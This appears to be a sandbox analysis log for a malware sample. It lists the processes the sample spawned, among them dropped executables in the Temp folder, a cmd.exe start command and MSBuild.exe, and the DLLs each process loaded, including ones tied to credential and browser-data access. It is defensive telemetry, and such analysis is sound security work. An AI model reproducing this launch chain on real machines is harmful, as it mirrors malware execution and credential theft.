Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2360
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.0.exe "C:\Users\user\AppData\Local\Temp\u3bs.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Process created: C:\Users\user\AppData\Local\Temp\u3bs.3.exe "C:\Users\user\AppData\Local\Temp\u3bs.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Section loaded: wevtapi.dll
